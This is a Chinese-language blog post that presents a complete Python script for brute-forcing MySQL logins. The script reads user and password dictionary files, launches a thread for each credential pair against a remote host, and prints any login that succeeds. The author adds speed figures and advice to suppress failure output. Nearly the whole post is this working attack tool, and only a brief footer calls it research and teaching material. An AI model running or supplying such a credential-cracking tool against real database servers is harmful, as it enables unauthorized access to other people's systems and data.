Python开发Mysql爆破工具

2019-07-01 0 评 982 阅 0 赞

想要爆破MySQL目标至少要允许远程连接，一个强壮的字典是爆破的关键所在

本地测试为：6272个密码，4秒5左右,因为我把正确的放到最后一个

用的时候把密码错误输出的屏蔽了，否则速度降半。

#!coding=utf-8
import re
import socket
import optparse
import threading
import time
 
try:
    import pymysql
except ImportError:
        print "[!!!]需要先安装pymysql模块"
        print "[!!!]Usage:pip install pymysql"
        exit()
 
result_user =None
result_pass =None
threads =[]
 
 
#----------------------------------------------------------------------
def main():
    """
    主函数，处理输入的参数
    """
    parse = optparse.OptionParser('python %prog -H <target host> --u <users dictionary> --p <password dictionary> -P <port>')    
    parse.add_option('-H', dest="target_host", type="string", help='目标主机')
    parse.add_option('--u', dest='user_dic', type='string', help='用户字典')
    parse.add_option('--p', dest='pwd_dic', type='string', help='密码字典')
    parse.add_option('-P', dest='port', type='int', help='端口')
    (options, args) = parse.parse_args()
    target_host = options.target_host
    user_dic = options.user_dic
    pwd_dic = options.pwd_dic
    port = options.port
    if target_host is not None:
        mysql_brute(target_host, user_dic, pwd_dic, port)
    else:
        print "[!!!]Unknon IP"
        exit()
 
 
#----------------------------------------------------------------------
def mysql_brute(host,user_dic,pwd_dic,port):
    """
     MySQL暴力破解
    :param host: 主机
    :param user_dic: 用户字典
    :param pwd_dic: 密码字典
    :param port: 端口
    :return: None
    """
    global start_time
    start_time =time.time()
    print "[*] Target:" + host
    print "[*] Start cracking"
    userlist = None
    pwdlist = None
    try:
        socket.gethostbyname(host)
    except Exception:
        print '[*] Cannot connect to %s' % host
        exit()
    try:
        userlist = [i.strip('\n') for i in open(user_dic, 'r').readlines()]
        pwdlist = [j.strip('\n') for j in open(pwd_dic, 'r').readlines()]
        print "[*] Number of users:" + str(len(userlist))
        print "[*] Number of passwords:" + str(len(pwdlist))
    except Exception:
        print "[!] The path of the dictionary file is incorrect"
        exit()
    global threads
    for user in userlist:
        for pwd in pwdlist:
            if result_user is None and result_pass is None:
                t = threading.Thread(target=mysql_login, args=(host, user, pwd, port))
                t.start()
                threads.append(t)
 
#----------------------------------------------------------------------    
def mysql_login(host, username, password, port):
    """
    MySQL连接
    :param host:主机
    :param username:用户名
    :param password: 密码
    :param port: 端口
    :return: None
    """
    try:
        db = pymysql.Connect(host=host, port=port, user=username, passwd=password)
        print "\033[1;32;41m[+] Success! User:" + username + " Password:" + password + "\033[0m"
        global result_user, result_pass
        global end_time
        end_time = time.time()
        result_user = username
        result_pass = password
        db.close()
        exit()
    except Exception:
        #print "[-] Fail! User:" + username + " Password:" + password
        pass
 
#----------------------------------------------------------------------
if __name__ == '__main__':
    main()
    for thread in threads:
        thread.join()
        if result_user is not None and result_pass is not None:
            print "用时：%s秒" %(end_time-start_time)
            print "\033[1;32;41m[+] Result: %s - %s\033[0m" % (result_user, result_pass)
            exit()
            if result_user is None and result_pass is None:
                print "[+] Crack Fail"

Python开发Mysql爆破工具

免责声明：本博客的提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!

发表评论取消回复

免责声明：本博客的提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!

相关文章

发表评论 取消回复

发表评论取消回复